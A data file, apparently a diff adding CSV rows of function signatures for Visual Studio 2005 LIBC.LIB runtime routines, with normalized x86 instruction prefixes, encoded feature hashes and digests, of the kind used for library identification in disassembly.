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,[],9115c7d3e9324a70cca1600d103d358d02833b33,VS2005,LIBC.LIB
+__heapchk,"PUSH -4\nPOP R32\nPUSH CONST\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",STfAIU+LzApbP0M+54u1Tk+LzApbP0M+GhA7Vk+LzAoAAAAASM/oe+eLtU5JN8AhJRB/6AAAAAAAAAAAWz9DPiUQf+gaEDtWT4vMCgAAAAAAAAAA,[],baa001f282a49c8285920fa847909eb70e51c3d9,VS2005,LIBC.LIB
+__heapset,"PUSH -4\nPOP R32\nPUSH CONST\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",STfAIU+LzApbP0M+54u1Tk+LzApbP0M+GhA7Vk+LzAoAAAAANRZyE0jP6HsAAAAASM/oe+eLtU5JN8AhJRB/6AAAAAAAAAAAWz9DPiUQf+gaEDtWT4vMCgAAAAAAAAAA,[],102f5975ce2ede19f91f83e8ddeec3ba093074a5,VS2005,LIBC.LIB
+__statusfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32",N5xz/QAAAAAAAAAA,W9AV4FvQFeCymcisd5/nxlvQFeBYWXafspnIrFvQFeAAAAAAW9AV4FvQFeCymcisspnIrFvQFeAAAAAAW9AV4AGhdbMqs0LeWFl2n1vQFeAAAAAAW9AV4FvQFeCymcisKrNC3gGhdbMAAAAAspnIrFvQFeAAAAAAAaF1swAAAAAAAAAAW9AV4FvQFeCymcisspnIrFvQFeAAAAAA,55b3964ec56e4715d5288b1888e1d2e095dad685,VS2005,LIBC.LIB
+__clearfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nFSTSW WORD PTR SS:[EBP+CONST]\nFCLEX\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32",m0dB+gAAAAAAAAAA,KrNC3gGhdbMAAAAAspnIrFvQFeAAAAAAAaF1swAAAAAAAAAAW9AV4FvQFeCymcisspnIrFvQFeAAAAAAW9AV4FvQFeCymcisd5/nxlvQFeBYWXafspnIrFvQFeAAAAAAW9AV4FvQFeCymcisspnIrFvQFeAAAAAAW9AV4AGhdbMqs0LeWFl2n1vQFeAAAAAAW9AV4FvQFeCymcis,a1bd10f84347da18b979220074512f3617131e30,VS2005,LIBC.LIB
+__controlfp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN",8o658QAAAAAAAAAA,hI9iZgAAAAAAAAAA,201c5abb441c27478f3fbef981cf1ccc45f61cf2,VS2005,LIBC.LIB
+__control87,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST",hI9iZgAAAAAAAAAA,cug6RW+twNoNzMABDczAAW+twNoAAAAADczAAW+twNoAAAAA57gxqnWmZGZy6DpFb63A2nWmZGZy6DpFcug6RblYWmmXcVGel3FRnrlYWmkAAAAAdaZkZgGhdbMqs0Le73bvBFvQFeBYWXafuVhaaQGhdbMqs0LeKrNC3gGhdbMAAAAAWFl2n1vQFeAAAAAAAaF1swAAAAAAAAAAspnIrFvQFeAAAAAAW9AV4FvQFeBTRYeuU0WHrlvQFeBTRYeuW9AV4FvQFeBTRYeuU0WHrlvQFeBTRYeuW9AV4FvQFeBTRYeuW9AV4FvQFeCymcisU0WHru80c3q9S2LgW9AV4O80c3q9S2LgvUti4G+twNpY2ig67zRzem+twNpY2ig6WNooOue4MapY2ig6WNooOg3MwAFy6DpF,97844ff58e640c9c8aa6e8d24120ca7686153aba,VS2005,LIBC.LIB
+__fpreset,"PUSH R32\nMOV R32,DWORD PTR DS:[0]\nFINIT\nCALL CONST\nTEST R32,R32\nJCC CONST",K3LYBADh1msAAAAADt/kkADh1msrctgEF2W63QDh1msO3+SQAOHWawAAAAAAAAAA,[],29e3c65001a3454ef1b30d36adf1b0caf4173d73,VS2005,LIBC.LIB
+__fptrap,PUSH CONST\nCALL CONST\nPOP R32\nRETN,ojBH2AAAAAAAAAAA,7g2DFgAAAAAAAAAAJAPDne4NgxapmnivqZp4rwAAAAAAAAAA,2a294d510d510dd6d84592fd3d2e209cfc63aebe,VS2005,LIBC.LIB
+__waccess,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nCMP R32,-1\nJCC CONST",2M0EplLONpUw/Hwim5BQ/AAAAAAAAAAAMETjpNjNBKb2zBUhUs42lQAAAAAAAAAAMPx8IlLONpWomYuaqJmLmpuQUPwAAAAA9swVIZuQUPwAAAAA,[],8259446caca8b06ec14a7c436cf34f3770180b50,VS2005,LIBC.LIB
+___crtLCMapStringA,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[0]\nCMP CONST,CONST",1excSLshlPYAAAAAgvcbCU79CxTnDlXlJu7hZeKh3IcAAAAA4qHchwAAAAAAAAAA5w5V5eKh3IcAAAAAZnkxNeKh3IcAAAAAFd4O3nLoOkUAAAAAuyGU9ibu4WWsf4SorH+EqCbu4WUZUQ7SVBzX7SCkUX9qhssSTv0LFCbu4WW7IZT2uyGU9vT20CZlWEcmZVhHJibu4WXV7FxIGVEO0ibu4WUnD3US9PbQJibu4WXV7FxIaobLErshlPYAAAAAIKRRfybu4WXjVnKrcug6RSbu4WUrD8KMKw/CjCbu4WVT3XTRJw91EhXeDt5OasPOTmrDzmZ5MTXfE8Dl3xPA5Sbu4WVx5CUn41Zyq4L3GwnFhoGeceQlJ2Z5MTUm7uFlU9100U4G5yB1O0xhuyGU9oL3GwnFhoGedTtMYSXPlncAAAAAxYaBnk79CxTnDlXlTgbnICbu4WVmeTE1GO/vFrshlPZUHNftJc+Wdybu4WVmeTE1,[],a11d25e74bac689c604e90d696b3e66f71074737,VS2005,LIBC.LIB
+__wsearchenv,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nMOVZX R32,WORD PTR SS:[EBP+R32*2+CONST]\nLEA R32,DWORD PTR SS:[EBP+R32*2+CONST]\nCMP R32,CONST",4wj8KEL41tYAAAAAzMbS4YwcTqjjCPwou7ZcLLD5uNa7tlwsUKnj3LDKW2DMxtLhGpMPV0L41tYAAAAAQvjW1gAAAAAAAAAAu7ZcLLD5uNaZ51OMcrsebEL41tZGLozsd5JMwLD5uNa7tlwssMpbYEL41tYAAAAAmedTjLD5uNYAAAAABslAruMI/CiMHE6ojBxOqOMI/Ch3kkzAsPm41szG0uFQqePcRi6M7EL41tYAAAAA6NkKZPOzo+lyux5s87Oj6QbJQK4akw9X,[],2010e12ce0b7da901a3c65b73bbdb0876ece346d,VS2005,LIBC.LIB
+__spawnle,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",e+PGC3vjxgt56L56eei+egAAAAAAAAAAAoVQxXnovnp748YL,[],171d62738e5e0ba6a732fa0c2d5ef2e0b94bae4f,VS2005,LIBC.LIB
+___InternalCxxFrameHandler,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,CONST\nCMP DWORD PTR DS:[R32],R32\nJCC CONST",UmJnK/HP1sS7IZT2nIZROFhZdp+gLhZNm6cxbVhZdp8AAAAAoC4WTVhZdp8AAAAAuyGU9vHP1sRBjXwbayACsZyGUTichlE4QY18G/HP1sQoJzsxWFl2n9aEbDkAAAAAe7L2qZyGUTichlE41oRsOQGhdbMAAAAA8c/WxJunMW0AAAAAAaF1swAAAAAAAAAAKCc7MdaEbDkAAAAAnIZROFhZdp9SYmcrnIZROFhZdp+chlE4nxDKfHuy9qlrIAKx,[],3d765bc89169efbe5bb989b72913df5f19cc2370,VS2005,LIBC.LIB
+___FrameUnwindToState,"CALL CONST\nAND DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32+R32*8+CONST]\nTEST R32,R32\nJCC CONST",gM607d8TwOUAAAAAE6TvvxrHK3K7tlws46KrfIDOtO0AAAAADlp47eOiq3xdfQvOGscrcgAAAAAAAAAA3xPA5RrHK3K7tlwsXX0LzoDOtO0AAAAA5oV7ZuOiq3xdfQvOu7ZcLOaFe2bfE8Dl3xPA5Q5aeO3mhXtm,[],4116ada7f110b87d127408ece86fd481ae327359,VS2005,LIBC.LIB
+?_DestructExceptionObject@@YAXPAUEHExceptionRecord@@E@Z,"AND DWORD PTR SS:[EBP+CONST],0\nPUSH R32\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nOR DWORD PTR SS:[EBP+CONST],CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32",VR0RHQAAAAAAAAAAl3xry1UdER1BjXwbQY18G1UdER2sDw4frA8OHwAAAAAAAAAA,[],a2e822828f15d05d0d218727ce4aa8380e635fac,VS2005,LIBC.LIB
+_wcscpy,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nMOV R16,WORD PTR DS:[R32]\nLEA R32,DWORD PTR DS:[R32+CONST]\nMOV WORD PTR DS:[R32],R16",QnEwrWDVKxwAAAAAYNUrHADh1mtCcTCtAOHWawAAAAAAAAAAbvNIr2DVKxwAAAAA,[],35638942b4f3510e1b22974c6d07b8f6c1e1d2e9,VS2005,LIBC.LIB
+_wcscat,"MOV R16,WORD PTR DS:[R32]\nMOV WORD PTR DS:[R32],R16\nINC R32\nINC R32\nINC R32\nINC R32\nTEST R16,R16\nJCC CONST",w0xKCsNMSgoA4dZr6Xc008NMSgoAAAAABXWfjwV1n4/pdzTTAOHWawAAAAAAAAAAJyEVdOl3NNMFdZ+P,[],1f831f23b189766b93a058b9b5294775871e62e4,VS2005,LIBC.LIB
+__CItanh,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nADD BYTE PTR DS:[R32],R8\nADD BYTE PTR DS:[R32+R32*8+CONST],R8\nJMP FAR R32",CTKeHgAAAAAAAAAAmuufxwAAAAAAAAAAe4Z20Zrrn8cJMp4el3FRnnuGdtEAAAAA,[],a0ca3ab1cf583402a3c0ee2c8eef1b1b065ea04d,VS2005,LIBC.LIB
+_cosh,"MOV R32,0\nJMP SHORT CONST",OmU1PAAAAAAAAAAAl3FRnjplNTwAAAAA,[],df3a59894ca35ddacc0c500290dee53b4a0ef714,VS2005,LIBC.LIB
+_tanh,"MOV R32,0\nJMP SHORT CONST",NRZyEwAAAAAAAAAAXqODJzUWchMAAAAAl3FRnl6jgycAAAAA,[],0efd73f7b3fb10426f06c75a6363f75445227d2b,VS2005,LIBC.LIB
+__CIsinh,"MOV R32,0\nJMP CONST",/MSgqpdxUZ4AAAAAl3FRnjUWchMAAAAANRZyE5dxUZ4AAAAA,[],417ca40e03f635941442ee61b3ca4354b8f45f30,VS2005,LIBC.LIB
+__CIcosh,"MOV R32,0\nJMP SHORT CONST",l3FRnjUWchMAAAAAl3FRnl6jgycAAAAANRZyE5dxUZ4AAAAAXqODJzUWchMAAAAA,[],a05a81e88097aa93e17e1b514178e15b32cf5221,VS2005,LIBC.LIB
+_sinh,"MOV R32,0\nJMP SHORT CONST",NRZyE5dxUZ4AAAAAKrNC3jUWchMAAAAAl3FRnjUWchMAAAAA,[],5a35166aa9725b1a7334b8c52359d601388bb79b,VS2005,LIBC.LIB
+__fpclass,"MOV R32,R32\nNEG R32\nSBB R32,R32\nAND R8,CONST\nADD R32,CONST\nPOP EBP\nRETN",MXhCcAAAAAAAAAAAGc0saAAAAAAAAAAAO/TbUwAAAAAAAAAAB/2JQT/DesUAAAAAZR6+ZScyo/CLDRRM1nzuDD/DesUAAAAA1RtlVWUevmW9zMZS6gkuTgAAAAAAAAAAl9p7lNZ87gyX2nuUl9p7lNZ87gwH/YlBJzKj8OoJLk4ZzSxoiw0UTDv021OchlE4P8N6xQAAAAAAAAAA1nzuDD/DesUAAAAAvczGUjF4QnCX2nuUnIZROCcyo/A79NtT,[],ccf87459265ebb136e0a5a8a38bfbcaf6b116326,VS2005,LIBC.LIB
+__logb,"PUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",Gg4Kd8rch/S7tlwsytyH9OQSdnYAAAAA5BJ2di6JAm4AAAAAD745nOQSdnYAAAAA+Jdhsy6JAm4AAAAAu7ZcLIDYysW7tlwsgNjKxS6JAm4AAAAAu7ZcLMrch/TiLY4EIGixTJcYZUwaDgp3LokCbgAAAAAAAAAA4i2OBC6JAm4AAAAAlxhlTPiXYbMPvjmc,[],b897673d6ea8050ba1ee0bfd4d739d312fe84815,VS2005,LIBC.LIB
+__nextafter,"FLD QWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",iw0UTHyzS8hy6DpFh0dSP8QFbrIAAAAAxAVusio52tYAAAAAcug6RZnR2G91mpZHqTgBnQwaAOBxl5d2QUXQGyo52tYAAAAApzHdMsdULqeLPwWDKjna1osNFEyLDRRMXjSGIOQSdnYAAAAAiw0UTLoxaqly6DpFiz8Fg4s/BYOnMd0yQvjW1gAAAAAAAAAAebOCQOGr0AF5s4JAcug6RYsNFEy6MWqpujFqqeQSdnYAAAAAebOCQOGr0AEqs0LeKrNC3qcx3TIAAAAAx1Qupyo52tbo/oHQmdHYb+QSdnYAAAAApzHdMos/BYMXBrr8cZeXdqcx3TIMGgDgFwa6/EL41tYAAAAA6P6B0MQFbrIAAAAAuyGU9pnR2G+chlE4iz8Fg4s/BYOnMd0yx1Qupyo52taHR1I/DBoA4HWalke7IZT2cug6RXyzS8heNIYgiz8Fg4s/BYM7Gd4fuyGU9pnR2G9y6DpFiz8Fg0FF0BunMd0yOxneH5yhumzjoqt8dZqWR3mzgkC7IZT25BJ2dkL41tYAAAAApzHdMos/BYPHVC6npzHdMkFF0BvHVC6nfLNLyEL41tYAAAAApzHdMsdULqeLPwWDnIZROHmzgkCZ0dhv46KrfIs/BYMAAAAAiw0UTIsNFExy6DpFnKG6bIs/BYOnMd0ycug6RV40hiCLDRRM4avQAUL41tYAAAAAiz8Fg4s/BYOnMd0y,[],a277b66cc1b18fab9a9ffa04d4d85873469c05da,VS2005,LIBC.LIB
+__finite,"MOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nAND R16,CONST\nCMP R16,CONST\nSETNE R8\nMOV R32,R32\nRETN",ApKmxQAAAAAAAAAA,[],1abb6a22857854a4154fdc06b6a5704f749154d4,VS2005,LIBC.LIB
+__chgsign,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nNOT R32",ZyZRiwAAAAAAAAAA,[],cc7541cffd352956419b961c1a08e8f26f7f630e,VS2005,LIBC.LIB
+__copysign,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,DWORD PTR SS:[EBP+CONST]",Ri4avAAAAAAAAAAA,[],792793040b36b51b3c387daf98ab237b3f6c1207,VS2005,LIBC.LIB
+__scalb,"PUSH DWORD PTR SS:[ESP+CONST]\nFLD QWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nADD ESP,CONST\nRETN",1ZV47AAAAAAAAAAA,zmCu4OhVq9oRN+jlWNooOuhVq9oRN+jl6FWr2uhVq9ohaltdETfo5ehVq9qaUjuoLokCbgAAAAAAAAAAIWpbXX3raJIAAAAA6FWr2uhVq9qaUjuokvnw8OQSdnYAAAAAmlI7qOQSdnYAAAAA6FWr2u84bv7CotavwqLWr33raJIAAAAAkiOTBJcYZUwaDgp3MNv/0+QSdnYAAAAAlxhlTFkkI2DrbTvx62078S6JAm4AAAAA6FWr2uhVq9q0CwrgGg4Kd5L58PC7tlwstAsK4DDb/9MAAAAAWSQjYFjaKDrOYK7g5BJ2di6JAm4AAAAAu7ZcLOttO/G7tlwsu7ZcLJL58PAtGkBL7zhu/i6JAm4AAAAALRpASy6JAm4AAAAAfetokuQSdnYAAAAA,16bb65e84d9305e4986e43239594dd4dc576c3fb,VS2005,LIBC.LIB
+__isnan,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,CONST\nAND R32,R32\nCMP R16,CONST\nJCC CONST",9vATL1IO+LTNLBGmzSwRplIO+LSM+NV4pG6jrYz41Xj28BMvjPjVeFLONpVSDvi0Ug74tAAAAAAAAAAAUs42lQAAAAAAAAAA,[],f8fc5e8643515ddf9e853e518fe8bb91043ace22,VS2005,LIBC.LIB
+__decomp,"FLD QWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST",DQwOICcPdRIAAAAAkP7TAgpU+eqtLouWhQQLwrRDAmsAAAAAtEMCaycPdRIAAAAAiw0UTGY82Se7IZT2qSWgGjJyru/c2BMhuyGU9rxLa7NmPNknvEtrswAAAAAAAAAAJu7hZScPdRIAAAAAJw91EqkloBp7svape7L2qbRDAmuFBAvCrS6LlmN7+z4AAAAA3NgTITJyru8AAAAAY3v7PgAAAAAAAAAAZjzZJybu4WUNDA4gMnKu72N7+z4AAAAAClT56rxLa7OLDRRM,[],a7e0fc700bb11e34ab04e83dc63a9ed4d59a216a,VS2005,LIBC.LIB
+__get_exp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nSHR R32,CONST\nAND R16,CONST\nSUB R32,CONST\nMOVSX R32,R16\nRETN",KjRY6QAAAAAAAAAA,[],c82780ce70b5636db3a9347e30cef83a471c79d7,VS2005,LIBC.LIB
+__add_exp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nSHR R32,CONST\nAND R16,CONST\nMOVSX R32,R16\nFLD QWORD PTR SS:[ESP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nPUSH R32",OT7l/QAAAAAAAAAA,VjP+tAAAAAAAAAAA,1e01370cbc521ad8b520d389a6fc7090af47713c,VS2005,LIBC.LIB
+__set_bexp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nSHL R32,CONST",n23fSgAAAAAAAAAA,[],d1e473aeda1da0ffd7348c650252f747554555f5,VS2005,LIBC.LIB
+__set_exp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nADD R32,CONST",VjP+tAAAAAAAAAAA,[],26dc225e0af9abaf944332646286ee3e682e3f1d,VS2005,LIBC.LIB
+__sptype,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",uyGU9k+LzAoH/YlBuyGU9qB/vYXWfO4M1nzuDD/DesUAAAAAB/2JQT/DesUAAAAAP8N6xQAAAAAAAAAA1nzuDD/DesUAAAAAT4vMCgAAAAAAAAAAiw0UTKB/vYW7IZT21nzuDD/DesUAAAAA1FTCtU+LzAqLDRRMOpQsmIsNFEy7IZT2iw0UTAf9iUG7IZT2uyGU9qB/vYXWfO4MoH+9hdRUwrXWfO4M,[],bbaa19efcb9669884134bf6229ae9161b5c9e75f,VS2005,LIBC.LIB
+__setmode,"NEG R32\nSBB R32,R32\nMOV BYTE PTR DS:[R32],R8\nAND R16,CONST\nADD R32,R32\nPOP R32\nRETN",wrxAVgAAAAAAAAAA9vATLxmmZv+ou7U3JPTvpFgv2xgAAAAAGaZm/8K8QFYAAAAA7ItYhoPygRlTISXpWC/bGAAAAAAAAAAAg/KBGcK8QFYAAAAAvimVE/bwEy8k9O+kqLu1N1gv2xgAAAAAUyEl6YPygRm+KZUT,[],e96711f8b76b6c3c7edf613388334a51dd1374d7,VS2005,LIBC.LIB
+__wpopen,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nXOR R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL CONST,CONST\nCMP DWORD PTR SS:[EBP+R32+CONST],R32\nJCC CONST",l3FRnoV99DUAAAAA6jKEuIV99DX9hbf0cISMaUwvr10Yis13/YW39MTZicDpWGHrhX30NcTZicDpWGHrpDloGKOXw0VYKnTmz9VLoaQ5aBiljtU4xNmJwAAAAAAAAAAAo5fDRaOXw0VYKnTm6Vhh66VIkopu0Nc0H3nTgMTZicAWs3TCWCp05qOXw0UAAAAAbtDXNGNpH0MAAAAAu7ZcLHCEjGkYfrfeo5fDRcTZicBYKnTmGIrNd6OXw0VYKnTmO9S9h8TZicDbHu7GpUiSiqOXw0UDvxB9VQm3TXCEjGmC9xsJvfK2eKOXw0VYKnTmWCp05sTZicAAAAAAgvcbCRh+t967tlwsY2kfQ6OXw0UDvxB9A78QfaOXw0XP1UuhFdVti73ytngKq16HQvjW1gAAAAAAAAAA2x7uxsTZicDuvJZbqotvYqOXw0VYKnTmTC+vXUL41tYAAAAAGH633qZLiPv7ZvLi7ryWWxazdMIfedOACqtehxh+t95VCbdN+2by4kwvr10Yis13pY7VOKqLb2IV1W2LpkuI+0wvr10Yis13FrN0wuoyhLiXcVGe,[],1c18578450069932a06f09879de8a6580f6758db,VS2005,LIBC.LIB
+__ftime,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nCMP R32,-1\nJCC CONST",Wyc52SxqGKYAAAAAu7ZcLFsnOdnP62Icvf9+CzHe4pKfCyRNLGoYpgAAAAAAAAAAz+tiHFsnOdmchlE4Ne2YagAAAAAAAAAAnIZROFsnOdkZpmb/nwskTTXtmGq7tlwsGaZm/yxqGKYAAAAAMd7ikgAAAAAAAAAA,[],70c4c4891415ddeedfaaeee12cb434c4a4720db9,VS2005,LIBC.LIB
